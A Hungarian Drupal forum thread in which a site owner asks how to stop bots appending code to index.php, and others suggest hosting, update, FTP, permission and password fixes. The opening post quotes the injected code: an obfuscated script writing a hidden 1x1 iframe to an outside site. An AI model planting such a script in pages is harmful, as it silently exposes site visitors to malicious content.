Index.php - védelem

Modessa képe

Nem tudjátok, hogy hogyan lehet védekezni azok ellen a robotok ellen, amik időről időre az index.php végére ilyen toldásokat adnak hozzá?

<script>var fr=unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%73%73%6c%76%61%6c%69%64%61%74%6f%72%2e%6e%65%74%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e');document.write(fr);</script>

Már unom hogy minden nap ilyeneket kell leszedjek az index.php végéről hogy működjön az oldal.

Drupal verzió: 
Fórum: 
nevergone képe

Pl. úgy, hogy normális szolgáltatót választasz, amelyik védi a tárhelyed, használod a .htaaccess-t, nem kerülöd meg a Drupal által nyújtott biztonsági szolgáltatásokat, nem teszel fel ezernyi fejlesztés alatt álló modult az éles oldalra ész nélkül, az alaprendszert és a használt modulokat is frissíted, amint szükséges.

Tovább is van, mondjam még? :)

0
0
Modessa képe

Minden amit említettél stimmel és az oldalam megfelel a követelményeknek minden szempontból, tehát mond csak tovább!

0
0
nevergone képe

Ha a fenti dolgok mind megvannak, akkor már a szolgáltatóddal lehet a gond... linket tudsz adni?

0
0
Modessa képe

Link

Több mint 1 éve stabilan működő web-oldal.
Egy negyedéve csak az Übercart került rá, semmi más, azelőtt meg talán nyáron lett rátéve modul.

Drupal verzió: 6.10

Kb. 2 hete jelent meg a probléma.

0
0
Pál úr képe

Nevergone ötleteit kiegészítve:

Pl. úgy, hogy használsz a gépeden vírusirtót, tűzfalat, a ftp jelszót nem mented el, rábírod a szolgáltatódat, hogy állítsa be, hogy az ftp kapcsolatot csak egy IP-címről engedélyezze, stb.

0
0
Modessa képe

A gépemen NOD32 van, Comodo firewall.
A TotalCommander jelszó mentést lehet ki kéne venni, bár akkor már késő. :)

0
0
nevergone képe

Illetve változtasd meg az összes jelszavat, amit használsz a tárhelyedhez, ftp, sql...

0
0
aboros képe

mindig minden jelszavamat mentik az adott alkalmazásaim és ráadásul olyan operációs rendszert használok, amire pedig vírusírtó szoftver nem létezik.. akkor most mi van?

0
0

-
clear: both;

nevergone képe

A Drupalhoz semmi, a tárhely eléréséhez viszont lehet. A te rendszereden kevés a vírusírtó, és kevesebb a vírus is, ne feledd! :)

0
0
ninja képe

sgabe képe

ellenőrizd az index.php fájlodra vonatkozó jogosultságokat (ne legyen 777)

0
0
Modessa képe

Úgy néz ki a jelszavak megváltoztatása megoldotta a helyzetet.
Köszönöm a segítséget!

0
0